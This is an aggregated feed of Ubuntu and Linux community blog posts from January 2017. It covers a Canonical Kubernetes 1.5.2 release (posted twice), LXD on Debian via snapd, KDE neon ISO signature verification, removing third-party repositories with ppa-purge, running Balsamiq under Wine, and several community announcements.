January 24, 2017

We’re proud to announce support for Kubernetes 1.5.2 in the Canonical Distribution of Kubernetes. This is a pure upstream distribution of Kubernetes, designed to be easily deployable to public clouds, on-premise (ie vsphere, openstack), bare metal, and developer laptops. Kubernetes 1.5.2 is a patch release comprised of mostly bugfixes, and we encourage you to check out the release notes.

Getting Started:

Here’s the simplest way to get a Kubernetes 1.5.2 cluster up and running on an Ubuntu 16.04 system:

sudo apt-add-repository ppa:juju/stable
sudo apt-add-repository ppa:conjure-up/next</span>
sudo apt update
sudo apt install conjure-up
conjure-up kubernetes

During the installation conjure-up will ask you what cloud you want to deploy on and prompt you for the proper credentials. If you’re deploying to local containers (LXD) see these instructions for localhost-specific considerations.

For production grade deployments and cluster lifecycle management it is recommended to read the full Canonical Distribution of Kubernetes documentation.

Home page: https://jujucharms.com/canonical-kubernetes/

Source code: https://github.com/juju-solutions/bundle-canonical-kubernetes

How to upgrade

With your kubernetes model selected, you can deploy the bundle to upgrade your cluster if on the 1.5.x series of kubernetes. At this time releases before 1.5.x have not been tested. Depending on which bundle you have previously deployed, run:

juju deploy canonical-kubernetes

or

juju deploy kubernetes-core

If you have made tweaks to your deployment bundle, such as deploying additional worker nodes as a different label, you will need to manually upgrade the components. The following command list assumes you have made no tweaks, but can be modified to work for your deployment.

juju upgrade-charm kubernetes-master
juju upgrade-charm kubernetes-worker
juju upgrade-charm etcd
juju upgrade-charm flannel
juju upgrade-charm easyrsa
juju upgrade-charm kubeapi-load-balancer

This will upgrade the charm code, and the resources to kubernetes 1.5.2 release of the Canonical Distribution of Kubernetes.

New features:

  • Full support for Kubernetes v1.5.2.

General Fixes

  • #151 #187 It wasn’t very transparent to users that they should be using conjure-up when locally developing, conjure-up is now the defacto default mechanism for deploying CDK.

  • #173 Resolved permissions on ~/.kube on kubernetes-worker units

  • #169 Tuned the verbosity of the AddonTacticManager class during charm layer build process

  • #162 Added NO_PROXY configuration to prevent routing all requests through configured proxy [by @axinojolais]

  • #160 Resolved an error by flannel sometimes encountered during cni-relation-changed [by @spikebike]

  • #172 Resolved sporadic timeout issues between worker and apiserver due to nginx connection buffering [by @axinojolais]

  • #101 Work-around for offline installs attempting to contact pypi to install docker-compose

  • #95 Tuned verbosity of copy operations in the debug script for debugging the debug script.

Etcd layer-specific changes

  • #72 #70 Resolved a certificate-relation error where etcdctl would attempt to contact the cluster master before services were ready [by @javacruft]

Unfiled/un-scheduled fixes:

  • #190 Removal of assembled bundles from the repository. See bundle author/contributors notice below

Additional Feature(s):

  • We’ve open sourced our release management process scripts we’re using in a juju deployed jenkins model. These scripts contain the logic we’ve been running by hand, and give users a clear view into how we build, package, test, and release the CDK. You can see these scripts in the juju-solutions/kubernetes-jenkins repository. This is early work, and will continue to be iterated on / documented as we push towards the Kubernetes 1.6 release.

Notice to bundle authors and contributors:

The fix for #190 is a larger change that has landed in the bundle-canonical-kubernetes repository. Instead of maintaining several copies across several repositories of a single use-case bundle; we are now assembling the CDK based bundles as fragments (un-official nomenclature).

This affords us the freedom to rapidly iterate on a CDK based bundle and include partner technologies, such as different SDN vendors, Storage backend components, and other integration points. Keeping our CDK bundle succinct, and allowing the more complex solutions to be assembled easily, reliably, and repeatedly. This does change the contribution guidelines for end users.

Any changes to the core bundle should be placed in its respective fragment under the fragments directory. Once this has been placed/merged, the primary published bundles can be assembled by running ./bundle in the root of the repository. This process has been outlined in the repository README.md

We look forward to any feedback on how opaque/transparent this process is, and if it has any useful applications outside of our own release management process. The ./bundle python script is still very much geared towards our own release process, and how to assemble bundles targeted for the CDK. However we’re open to generalizing them and encourage feedback/contributions to make this more useful to more people.

How to contact us:

We’re normally found in these Slack channels and attend these sig meetings regularly:

Operators are an important part of Kubernetes, we encourage you to participate with other members of the Kubernetes community!

We also monitor the Kubernetes mailing lists and other community channels, feel free to reach out to us. As always, PRs, recommendations, and bug reports are welcome: https://github.com/juju-solutions/bundle-canonical-kubernetes

on January 24, 2017 03:28 PM

Recently, I have had the pleasure of working with a fantastic company called Endless who are building a range of computers and a Linux-based operating system called Endless OS.

My work with them has primarily been involved in the community and product development of an initiative in which they are integrating functionality into the operating system that teaches you how to code. This provides a powerful platform where you can learn to code and easily hack on applications in the platform.

If this sounds interesting to you, I created a short video demo where I show off their Mission hardware as well as run through a demo of Endless Code in action. You can see it below:

I would love to hear what you think and how Endless Code can be improved in the comments below.

The post Endless Code and Mission Hardware Demo appeared first on Jono Bacon.

on January 24, 2017 12:35 PM

Welcome to the Ubuntu Weekly Newsletter. This is issue #495 for the weeks January 9 – 22, 2017, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

on January 24, 2017 02:24 AM

January 23, 2017

Big Software, IoT and Big Data are changing how organisations are architecting, deploying, and managing their infrastructure. Traditional models are being challenged and replaced by software solutions that are deployed across many environments and many servers. However, no matter what infrastructure you have, there are bare metal servers under it, somewhere.

Organisations are looking for more efficient ways to balance their hardware and infrastructure investments with the efficiencies of the cloud. Canonical’s MAAS (Metal As A Service) is such a technology. MAAS is designed for devops at scale, in places where bare metal is the best way to run your applications. Big data, private cloud, PAAS and HPC all thrive on MAAS. Hardware has always been an expensive and difficult resource to deploy within a data centre, but is unfortunately still a major consideration for any organisation moving all or part of their infrastructure to the cloud. To become more cost-effective, many organisations hire teams of developers to cobble together software solutions that solve functional business challenges while leveraging existing legacy hardware in the hopes of offsetting the need to buy and deploy more hardware-based solutions.

MAAS isn’t a new concept, but demand and adoption rates are growing because many enterprises want to combine the flexibility of cloud services with the raw power of bare metal servers to run high-power, scalable workloads. For example, when a new server needs to be deployed, MAAS automates most, if not all, of the provisioning process. Automation makes deploying solutions much quicker and more efficient because it allows tedious tasks to be performed faster and more accurately without human intervention. Even with proper and thorough documentation, manually deploying server to run web services or Hadoop, for example, could take hours compared to a few minutes with MAAS.

Forward thinking companies are leveraging server provisioning to combine the flexibility of the cloud with the power and security of hardware. For example:

  • High Performance Computing organisations are using MAAS to modernise how they deploy and allocate servers quickly and efficiently.
  • Smart Data centers are using MAAS to enable multi purpose their server usage to improve efficiency and ensure servers do not go underutilised.
  • Hybrid cloud providers leverage MAAS to provide extra server support during peak demand times and between various public cloud providers

This ebook: Server Provisioning: What Network Admins & IT Pros Need to Know outlines how innovative companies are leveraging MAAS to get more out of their hardware investment while making their cloud environments more efficient and reliable. Smart IT pros know that going to the cloud does not mean having to rip and replace their entire infrastructure to take advantage of the opportunities the cloud offers. Canonical’s MAAS is a mature solution to help organisations to take full advantage of their cloud and legacy hardware investments.

Get started with MAAS

To download and install MAAS for free please visit ubuntu.com/download/server-provisioning or to talk to one of our scale-out experts about deploying MAAS in your datacenter contact us. For more information please download our free eBook on MAAS.

Download eBook

on January 23, 2017 01:30 PM

We’re proud to announce support for Kubernetes 1.5.2 in the Canonical Distribution of Kubernetes. This is a pure upstream distribution of Kubernetes, designed to be easily deployable to public clouds, on-premise (ie vsphere, openstack), bare metal, and developer laptops. Kubernetes 1.5.2 is a patch release comprised of mostly bugfixes, and we encourage you to check out the release notes.

Getting Started:

Here’s the simplest way to get a Kubernetes 1.5.2 cluster up and running on an Ubuntu 16.04 system:

sudo apt-add-repository ppa:juju/stable
sudo apt-add-repository ppa:conjure-up/next
sudo apt update
sudo apt install conjure-up
conjure-up kubernetes

During the installation conjure-up will ask you what cloud you want to deploy on and prompt you for the proper credentials. If you’re deploying to local containers (LXD) see these instructions for localhost-specific considerations.

For production grade deployments and cluster lifecycle management it is recommended to read the full Canonical Distribution of Kubernetes documentation.

Home page: https://jujucharms.com/canonical-kubernetes/

Source code: https://github.com/juju-solutions/bundle-canonical-kubernetes

How to upgrade

With your kubernetes model selected, you can deploy the bundle to upgrade your cluster if on the 1.5.x series of kubernetes. At this time releases before 1.5.x have not been tested. Depending on which bundle you have previously deployed, run:

    juju deploy canonical-kubernetes

or

    juju deploy kubernetes-core

If you have made tweaks to your deployment bundle, such as deploying additional worker nodes as a different label, you will need to manually upgrade the components. The following command list assumes you have made no tweaks, but can be modified to work for your deployment.

juju upgrade-charm kubernetes-master
juju upgrade-charm kubernetes-worker
juju upgrade-charm etcd
juju upgrade-charm flannel
juju upgrade-charm easyrsa
juju upgrade-charm kubeapi-load-balancer

This will upgrade the charm code, and the resources to kubernetes 1.5.2 release of the Canonical Distribution of Kubernetes.

New features:

  • Full support for Kubernetes v1.5.2.

General Fixes

  • #151 #187 It wasn’t very transparent to users that they should be using conjure-up when locally developing, conjure-up is now the defacto default mechanism for deploying CDK.

  • #173 Resolved permissions on ~/.kube on kubernetes-worker units

  • #169 Tuned the verbosity of the AddonTacticManager class during charm layer build process

  • #162 Added NO_PROXY configuration to prevent routing all requests through configured proxy [by @axinojolais]

  • #160 Resolved an error by flannel sometimes encountered during cni-relation-changed [by @spikebike]

  • #172 Resolved sporadic timeout issues between worker and apiserver due to nginx connection buffering [by @axinojolais]

  • #101 Work-around for offline installs attempting to contact pypi to install docker-compose

  • #95 Tuned verbosity of copy operations in the debug script for debugging the debug script.

Etcd layer-specific changes

  • #72 #70 Resolved a certificate-relation error where etcdctl would attempt to contact the cluster master before services were ready [by @javacruft]

Unfiled/un-scheduled fixes:

  • #190 Removal of assembled bundles from the repository. See bundle author/contributors notice below

Additional Feature(s):

  • We’ve open sourced our release management process scripts we’re using in a juju deployed jenkins model. These scripts contain the logic we’ve been running by hand, and give users a clear view into how we build, package, test, and release the CDK. You can see these scripts in the juju-solutions/kubernetes-jenkins repository. This is early work, and will continue to be iterated on / documented as we push towards the Kubernetes 1.6 release.

Notice to bundle authors and contributors:

The fix for #190 is a larger change that has landed in the bundle-canonical-kubernetes repository. Instead of maintaining several copies across several repositories of a single use-case bundle; we are now assembling the CDK based bundles as fragments (un-official nomenclature).

This affords us the freedom to rapidly iterate on a CDK based bundle and include partner technologies, such as different SDN vendors, Storage backend components, and other integration points. Keeping our CDK bundle succinct, and allowing the more complex solutions to be assembled easily, reliably, and repeatedly. This does change the contribution guidelines for end users.

Any changes to the core bundle should be placed in its respective fragment under the fragments directory. Once this has been placed/merged, the primary published bundles can be assembled by running ./bundle in the root of the repository. This process has been outlined in the repository README.md

We look forward to any feedback on how opaque/transparent this process is, and if it has any useful applications outside of our own release management process. The ./bundle python script is still very much geared towards our own release process, and how to assemble bundles targeted for the CDK. However we’re open to generalizing them and encourage feedback/contributions to make this more useful to more people.

How to contact us:

We’re normally found in these Slack channels and attend these sig meetings regularly:

Operators are an important part of Kubernetes, we encourage you to participate with other members of the Kubernetes community!

We also monitor the Kubernetes mailing lists and other community channels, feel free to reach out to us. As always, PRs, recommendations, and bug reports are welcome: https://github.com/juju-solutions/bundle-canonical-kubernetes

on January 23, 2017 08:30 AM

January 21, 2017

When you download a KDE neon ISO you get transparently redirected to one of the mirrors that KDE uses. Recently the Polish mirror was marked as unsafe in Google Safebrowsing which is an extremely popular service used by most web browsers and anti-virus software to check if a site is problematic. I expect there was a problem elsewhere on this mirror but it certainly wasn’t KDE neon. KDE sysadmins have tried to contact the mirror and Google.

You can verify any KDE neon installable image by checking the gpg signature against the KDE neon ISO Signing Key.  This is the .sig file which is alongside all the .iso files.

gpg2 --recv-key '348C 8651 2066 33FD 983A 8FC4 DEAC EA00 075E 1D76'

wget http://files.kde.org/neon/images/neon-useredition/current/neon-useredition-current.iso.sig

gpg2 --verify neon-useredition-current.iso.sig
gpg: Signature made Thu 19 Jan 2017 11:18:13 GMT using RSA key ID 075E1D76
gpg: Good signature from "KDE neon ISO Signing Key <neon@kde.org>" [full]

Adding a sensible GUI to do this is future work and fairly tricky to do in a secure way but hopefully soon.

Facebooktwittergoogle_pluslinkedinby feather
on January 21, 2017 12:18 AM

January 20, 2017

You voted for change and today we’re bringing change. Today we give back the installer to the people. Today Calamares 3 was released.

It’s been a long standing wish of KDE neon to switch to the Calamares installer.  Calamares is a distro independent installer used by various projects such as Netrunner and Tanglu.  It’s written in Qt and KDE Frameworks and has modules in C++ or Python.

Today I’ve switched the Developer Unstable edition to Calamares and it looks to work pretty nicely.

However there’s a few features missing compared to the previous Ubiquity installer.  OEM mode might be in there but needs me to add some integration for it.  Restricted codecs install should be easy to add.  LUKS encrypted hard disk are there but also needs some integration from me.  Encrypted home holders isn’t there and should be added.  Updating to latest packages on install should also be added.  It does seem to work with UEFI computers, but not with secure boot yet. Let me know if you spot any others.

I’ve only tested this on a simple virtual machine, so give it a try and see what breaks. Or if you want to switch back run apt install ubiquity-frontend-kde ubiquity-slideshow-neon''.

Screenshot_generic_2017-01-20_18:05:56
Screenshot_generic_2017-01-20_18:06:07
Screenshot_generic_2017-01-20_18:06:25
Screenshot_generic_2017-01-20_18:06:57
Screenshot_generic_2017-01-20_18:07:12
Screenshot_generic_2017-01-20_18:07:29
Screenshot_generic_2017-01-20_18:07:34
Screenshot_generic_2017-01-20_18:09:50
Screenshot_generic_2017-01-20_18:11:24

Facebooktwittergoogle_pluslinkedinby feather
on January 20, 2017 06:23 PM

Snapping DBus

Harald Sitter

For the past couple of months I’ve been working on getting KDE applications into the binary bundle format snap.

With the release of snapd 2.20 last month it gained a much-needed feature to enable easy bundling of applications that register a DBus service name. The all new dbus interface makes this super easy.

Being able to easily register a DBus service matters a great deal because an extraordinary amount of KDE’s applications are doing just that. The use cases range from actual inter-process communication to spin-offs from this functionality, such as single-instance behavior and clean application termination via the kquitapp command-line utility.

There’s barely any application that gets by without also claiming its own space on the session bus, so it is a good thing that enabling this is now super easy when building snap bundles.

One simply adds a suitable slot to the snapcraft.yaml and that’s it:

slots:
    session-dbus-interface:
        interface: dbus
        name: org.kde.kmplot
        bus: session

An obvious caveat is that the application needs to claim a well-known name on the bus. For most of KDE’s applications this will happen automatically as the KDBusAddons framework will claim the correct name assuming the QCoreApplication properties were set with the relevant data to deduce the organization+app reverse-domain-name.

As an additional bonus, in KDE we tend to codify the used service name in the desktop files via the X-DBUS-ServiceName entry already. When writing a snapcraft.yaml it is easy to figure out if DBus should be used and what the service name is by simply checking the desktop file.

The introduction of this feature moves a really big roadblock out of the way for enabling KDE’s applications to be easily snapped and published.

on January 20, 2017 01:47 PM

January 19, 2017

Many people have been scratching their heads wondering what the new US president will really do and what he really stands for. His alternating positions on abortion, for example, suggest he may simply be telling people what he thinks is most likely to win public support from one day to the next. Will he really waste billions of dollars building a wall? Will Muslims really be banned from the US?

As it turns out, several movies provide a thought-provoking insight into what could eventuate. What's more, these two have a creepy resemblance to the Trump phenomenon and many of the problems in the world today.

Countdown to Looking Glass

On the classic cold war theme of nuclear annihilation, Countdown to Looking Glass is probably far more scary to watch on Trump eve than in the era when it was made. Released in 1984, the movie follows a series of international crises that have all come to pass: the assassination of a US ambassador in the middle east, a banking crisis and two superpowers in an escalating conflict over territory. The movie even picked a young Republican congressman for a cameo role: he subsequently went on to become speaker of the house. To relate it to modern times, you may need to imagine it is China, not Russia, who is the adversary but then you probably won't be able to sleep after watching it.

cleaning out the swamp?

The Omen

Another classic is The Omen. The star of this series of four horror movies, Damien Thorn, appears to have a history that is eerily reminiscent of Trump: born into a wealthy family, a series of disasters befall every honest person he comes into contact with, he comes to control a vast business empire acquired by inheritance and as he enters the world of politics in the third movie of the series, there is a scene in the Oval Office where he is flippantly advised that he shouldn't lose any sleep over any conflict of interest arising from his business holdings. Did you notice Damien Thorn and Donald Trump even share the same initials, DT?

on January 19, 2017 07:31 PM

UbuCons are a remarkable achievement from the Ubuntu community: a network of conferences across the globe, organized by volunteers passionate about Open Source and about collaborating, contributing, and socializing around Ubuntu. UbuCon Summit at SCALE 15x is the next in the impressive series of conferences.

UbuCon Summit at SCALE 15x takes place in Pasadena, California on March 2nd and 3rd during the first two days of SCALE 15x. Ubuntu will also have a booth at SCALE's expo floor from March 3rd through 5th.

We are putting together the conference schedule and are announcing a call for papers. While we have some amazing speakers and an always-vibrant unconference schedule planned, it is the community, as always, who make UbuCon what it is—just as the community sets Ubuntu apart.

Interested speakers who have Ubuntu-related topics can submit their talk to the SCALE call for papers site. UbuCon Summit has a wide range of both developers and enthusiasts, so any interesting topic is welcome, no matter how casual or technical. The SCALE CFP form is available here:

http://www.socallinuxexpo.org/scale/15x/cfp

Over the next few weeks we’ll be sharing more details about the Summit, revamping the global UbuCon site and updating the SCALE schedule with all relevant information.

http://www.ubucon.org/

About SCaLE:

SCALE 15x, the 15th Annual Southern California Linux Expo, is the largest community-run Linux/FOSS showcase event in North America. It will be held from March 2-5 at the Pasadena Convention Center in Pasadena, California. For more information on the expo, visit https://www.socallinuxexpo.org

on January 19, 2017 10:12 AM

January 18, 2017

LXD on Debian (using snapd)

Stéphane Graber

LXD logo

Introduction

So far all my blog posts about LXD have been assuming an Ubuntu host with LXD installed from packages, as a snap or from source.

But LXD is perfectly happy to run on any Linux distribution which has the LXC library available (version 2.0.0 or higher), a recent kernel (3.13 or higher) and some standard system utilities available (rsync, dnsmasq, netcat, various filesystem tools, …).

In fact, you can find packages in the following Linux distributions (let me know if I missed one):

We have also had several reports of LXD being used on Centos and Fedora, where users built it from source using the distribution’s liblxc (or in the case of Centos, from an external repository).

One distribution we’ve seen a lot of requests for is Debian. A native Debian package has been in the works for a while now and the list of missing dependencies has been shrinking quite a lot lately.

But there is an easy alternative that will get you a working LXD on Debian today!
Use the same LXD snap package as I mentioned in a previous post, but on Debian!

Requirements

  • A Debian “testing” (stretch) system
  • The stock Debian kernel without apparmor support
  • If you want to use ZFS with LXD, then the “contrib” repository must be enabled and the “zfsutils-linux” package installed on the system

Installing snapd and LXD

Getting the latest stable LXD onto an up to date Debian testing system is just a matter of running:

apt install snapd
snap install lxd

If you never used snapd before, you’ll have to either logout and log back in to update your PATH, or just update your existing one with:

. /etc/profile.d/apps-bin-path.sh

And now it’s time to configure LXD with:

root@debian:~# lxd init
Name of the storage backend to use (dir or zfs) [default=dir]:
Create a new ZFS pool (yes/no) [default=yes]?
Name of the new ZFS pool [default=lxd]:
Would you like to use an existing block device (yes/no) [default=no]?
Size in GB of the new loop device (1GB minimum) [default=15]:
Would you like LXD to be available over the network (yes/no) [default=no]?
Would you like stale cached images to be updated automatically (yes/no) [default=yes]?
Would you like to create a new network bridge (yes/no) [default=yes]?
What should the new bridge be called [default=lxdbr0]?
What IPv4 subnet should be used (CIDR notation, “auto” or “none”) [default=auto]?
What IPv6 subnet should be used (CIDR notation, “auto” or “none”) [default=auto]?
LXD has been successfully configured.

And finally, you can start using LXD:

root@debian:~# lxc launch images:debian/stretch debian
Creating debian
Starting debian

root@debian:~# lxc launch ubuntu:16.04 ubuntu
Creating ubuntu
Starting ubuntu

root@debian:~# lxc launch images:centos/7 centos
Creating centos
Starting centos

root@debian:~# lxc launch images:archlinux archlinux
Creating archlinux
Starting archlinux

root@debian:~# lxc launch images:gentoo gentoo
Creating gentoo
Starting gentoo

And enjoy your fresh collection of Linux distributions:

root@debian:~# lxc list
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
|   NAME    |  STATE  |         IPV4          |                     IPV6                      |    TYPE    | SNAPSHOTS |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
| archlinux | RUNNING | 10.250.240.103 (eth0) | fd42:46d0:3c40:cca7:216:3eff:fe40:7b1b (eth0) | PERSISTENT | 0         |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
| centos    | RUNNING | 10.250.240.109 (eth0) | fd42:46d0:3c40:cca7:216:3eff:fe87:64ff (eth0) | PERSISTENT | 0         |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
| debian    | RUNNING | 10.250.240.111 (eth0) | fd42:46d0:3c40:cca7:216:3eff:feb4:e984 (eth0) | PERSISTENT | 0         |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
| gentoo    | RUNNING | 10.250.240.164 (eth0) | fd42:46d0:3c40:cca7:216:3eff:fe27:10ca (eth0) | PERSISTENT | 0         |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
| ubuntu    | RUNNING | 10.250.240.80 (eth0)  | fd42:46d0:3c40:cca7:216:3eff:fedc:f0a6 (eth0) | PERSISTENT | 0         |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+

Conclusion

The availability of snapd on other Linux distributions makes it a great way to get the latest LXD running on your distribution of choice.

There are still a number of problems with the LXD snap which may or may not be a blocker for your own use. The main ones at this point are:

  • All containers are shutdown and restarted on upgrades
  • No support for bash completion

If you want non-root users to have access to the LXD daemon. Simply make sure that a “lxd” group exists on your system and add whoever you want to manage LXD into that group, then restart the LXD daemon.

Extra information

The snapd website can be found at: http://snapcraft.io

The main LXD website is at: https://linuxcontainers.org/lxd
Development happens on Github at: https://github.com/lxc/lxd
Mailing-list support happens on: https://lists.linuxcontainers.org
IRC support happens in: #lxcontainers on irc.freenode.net
Try LXD online: https://linuxcontainers.org/lxd/try-it

on January 18, 2017 10:19 PM

January 17, 2017

Suppose you added a third-party repository of DEB packages in your Ubuntu and you now want to completely remove it, by either downgrading the packages to the official version in Ubuntu or removing them altogether. How do you do that?

Well, if it was a Personal Package Archive (PPA), you would simply use ppa-purge. ppa-purge is not pre-installed in Ubuntu, so we install it with

sudo apt update
sudo apt install ppa-purge

Here is the help for ppa-purge:

$ ppa-purge
Warning:  Required ppa-name argument was not specified
Usage: sudo ppa-purge [options] <ppa:ppaowner>[/ppaname]

ppa-purge will reset all packages from a PPA to the standard
versions released for your distribution.

Options:
    -p [ppaname]        PPA name to be disabled (default: ppa)
    -o [ppaowner]        PPA owner
    -s [host]        Repository server (default: ppa.launchpad.net)
    -d [distribution]    Override the default distribution choice.
    -y             Pass -y --force-yes to apt-get or -y to aptitude
    -i            Reverse preference of apt-get upon aptitude.
    -h            Display this help text

Example usage commands:
    sudo ppa-purge -o xorg-edgers
    will remove https://launchpad.net/~xorg-edgers/+archive/ppa

    sudo ppa-purge -o sarvatt -p xorg-testing
    will remove https://launchpad.net/~sarvatt/+archive/xorg-testing

    sudo ppa-purge [ppa:]ubuntu-x-swat/x-updates
    will remove https://launchpad.net/~ubuntu-x-swat/+archive/x-updates

Notice: If ppa-purge fails for some reason and you wish to try again,
(For example: you left synaptic open while attempting to run it) simply
uncomment the PPA from your sources, run apt-get update and try again.

Here is an example of ppa-purge that removes a PPA:
Suppose we want to completely uninstall the Official Wine Builds PPA. The URI of the PPA is shown on that page in bold, and it is ppa:wine/wine-builds.

To uninstall this PPA, we run

$ sudo ppa-purge ppa:wine/wine-builds
Updating packages lists
PPA to be removed: wine wine-builds
Package revert list generated:
wine-devel- wine-devel-amd64- wine-devel-i386:i386- winehq-devel-

Disabling wine PPA from
/etc/apt/sources.list.d/wine-ubuntu-wine-builds-xenial.list
Updating packages lists
...
PPA purged successfully
$ _

But how do we completely uninstall the packages of a third-party repository? Those do not have a URI that is similar to the format that ppa-purge needs!

Let’s see an example. If you have an Intel graphics card, you may choose to install their packaged drivers from 01.org. For Ubuntu 16.04, the download page is https://01.org/linuxgraphics/downloads/intel-graphics-update-tool-linux-os-v2.0.2  Yes, they provide a tool that you run on your system and performs a set of checks. Once those checks pass, it adds the Intel repository for Intel Graphics card drivers. You do not see a similar URI from this page, you need to dig deeper after you installed them to find out.

The details of the repository are in /etc/apt/sources.list.d/intellinuxgraphics.list and it is this single line

deb https://download.01.org/gfx/ubuntu/16.04/main xenial main #Intel Graphics drivers

How did we figure out the parameters for ppa-purge? These parameters are just used to identify the correct file in /var/lib/apt/lists/ For the case of the Intel drivers, the relevant files in /var/lib/apt/lists are

/var/lib/apt/lists/download.01.org_gfx_ubuntu_16.04_main_dists_xenial_InRelease
/var/lib/apt/lists/download.01.org_gfx_ubuntu_16.04_main_dists_xenial_main_binary-amd64_Packages
/var/lib/apt/lists/download.01.org_gfx_ubuntu_16.04_main_dists_xenial_main_binary-i386_Packages

The important ones are the *_Packages files. The important source code line in ppa-purge that will help us, is

PPA_LIST=/var/lib/apt/lists/${PPAHOST}_${PPAOWNER}_${PPANAME}_*_Packages

therefore, we select the parameters for ppa-purge accordingly:

-s download.01.org   for   ${PPAHOST}
-o gfx               for   ${PPAOWNER}
-p ubuntu            for   ${PPANAME}

Now ppa-purge can remove the packages from such a PPA as well, by using these parameters:

sudo ppa-purge -s download.01.org -o gfx -p ubuntu

That’s it!

on January 17, 2017 10:20 PM

January 16, 2017

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In December, about 175 work hours have been dispatched among 14 paid contributors. Their reports are available:

Evolution of the situation

The number of sponsored hours did not increase but a new silver sponsor is in the process of joining. We are only missing another silver sponsor (or two to four bronze sponsors) to reach our objective of funding the equivalent of a full time position.

The security tracker currently lists 31 packages with a known CVE and the dla-needed.txt file 27. The situation improved a little bit compared to last month.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

on January 16, 2017 02:39 PM

This post is mostly a mea culpa to all the folks that asked me after a presentation: “And those slides will be online?” The answer is generally “yes” but they were in a tweet or something equally as hard to find. But now I finally got to making an updated presentations page that is actually useful. Hopefully you can find the slides you are looking for there. And more importantly you can use them as a basis for your talk to a local group in your town.

As I was redoing this I thought it was a bit interesting how my title pages seem to alternate every couple of years between complex and simple. And I think I have a candidate for worst theme (though there was a close second). Also a favorite theme along with a reminder of all the fun it is to make a presentation with JessyInk.

I think that there are a couple missing that I can’t find, and also video links out on the Internet somewhere. Please drop me a line if you have any ideas, suggestions or I sent you files that I’ve now lost. Hopefully this is easier to maintain now so there won’t be the same delay.

on January 16, 2017 06:00 AM

January 15, 2017

KDE's Google Code-in party is ending once again. Student work submitted deadline is January 16, 2017 at 09:00 (PST). 

Mentors, you have until January 18, 2017 at 09:00 (PST) to evaluate your student's work. Please get that done before the deadline, so that admins don't have to judge the student work.

Then it will be time to choose winners. We need to have our choices in by January 23, 2017 at 09:00 (PST). Winners and Finalists will be announced January 30, 2017 at 09:00 (PST).

To me, this contest has been lovely. Because there are more organizations participating now, there are more tasks for students, and less pressure on each org. It seems that the students have enjoyed themselves as well.

Spencerb said, in #kde-soc, This was my first (and final) gci, so I don't have much of a point of comparison, but it's been awesome. I've been an opportunity to meet new people and just get involved with KDE, which I've wanted to do for a long time. I've also learned a lot about serious software development that I wouldn't have otherwise.

"I'll turn 18 this Monday, which is why this is my last year :(  I'm so glad to have had the chance to participate at least once.

As a task, Harpreet filed a GCi review: http://aboutgci2016.blogspot.in/

So far, we've had 121 students. The top ten have 103 completed tasks so far! And 160 tasks completed so far. Most exciting for me is that Beginner tasks completed: 45. Getting kids acquainted with Free and Open Source Software communities, which is why every organization must have beginner tasks. I'm glad 45 kids got to know KDE a bit.


on January 15, 2017 05:04 AM

January 14, 2017

Balsamiq is one of the best tools for quick wireframes creation. It allows you to efficiently and quickly create mockups that give you an idea of how design elements fit in the page.

Some years ago there was a package available for the most popular Linux distributions, but since Adobe dropped support for Linux and Balsamiq is built on top of Adobe Air, nowadays they don’t support Linux neither.

As you can see from the downloads page of Balsamiq, though, it luckily works well with wine.

Install Balsamiq with WINE

First things first: install wine.

sudo apt-get install wine

Now, let’s proceed with an easy step-by-step guide.

  1. Download the Balsamiq Bundle that includes Adobe Air (if the link does not work, head on to Balsamic Downloads and download the version With Adobe Air bundled)
  2. Open a terminal, unzip the bundle and move it to /opt (change the Downloads directory name according to your setup)
    cd Downloads
    unzip Balsamiq*
    sudo mv Balsamiq* /opt
  3. To make life easier, rename the .exe to simply balsamiq.exe
    cd /opt/Balsamiq_Mockups_3/
    mv Balsamiq\\ Mockups\\ 3.exe balsamiq.exe
  4. Now you can run Balsamiq Mockups by running it with wine
    wine /opt/Balsamiq_Mockups_3/balsamiq.exe

Add Balsamiq as an application

The last optional step can save you a lot of time in launching Balsamiq, because it saves you the hassle of writing the command in point 4 above every time you want to launch it (and remembering the Balsamiq executable location). This simply consists in creating a new desktop entry for Balsamiq, which will add it to the applications list of your operating system.

Create the file ~/.local/share/applications/Balsamiq.desktop with the following content:

[Desktop Entry]
Encoding=UTF-8
Name=Balsamiq Mockups
Icon=/opt/Balsamiq_Mockups_3/icons/mockups_ico_48.png
Exec=wine /opt/Balsamiq_Mockups_3/balsamiq.exe
Type=Application
Categories=Graphics;
MimeType=application/x-xdg-protocol-tg;x-scheme-handler/tg;

If you are on Ubuntu with Unity, you can add the following lines too:

StartupNotify=false
StartupWMClass=balsamiq.exe
X-UnityGenerated=true

Now, just save and have a look at your Dash or Activity Panel to see if it works.

Install Balsamiq Mockups with Play on Linux

Eric suggests the use of Play on Linux for an easier installation process and reports that for him Balsamiq Mockups 3 works like a charm in that environment. Worth a try!

The post Install Balsamiq Mockups in Debian/Ubuntu appeared first on deshack.

on January 14, 2017 09:16 AM

There are times in standard social interactions where people ask what you do professionally, which means I end up talking about Ubuntu and specifically Ubuntu Phone. Many times that comes down to the seemingly simple question: “Why would I want an Ubuntu phone?” I’ve tried the answer “becasue I’m a thought leader and you should want to be like me,” but sadly that gets little traction outside of Silicon Valley. Another good answer is all the benefits of Free Software, but many of those are benefits the general public doesn’t yet realize they need.

Ubuntu Phone

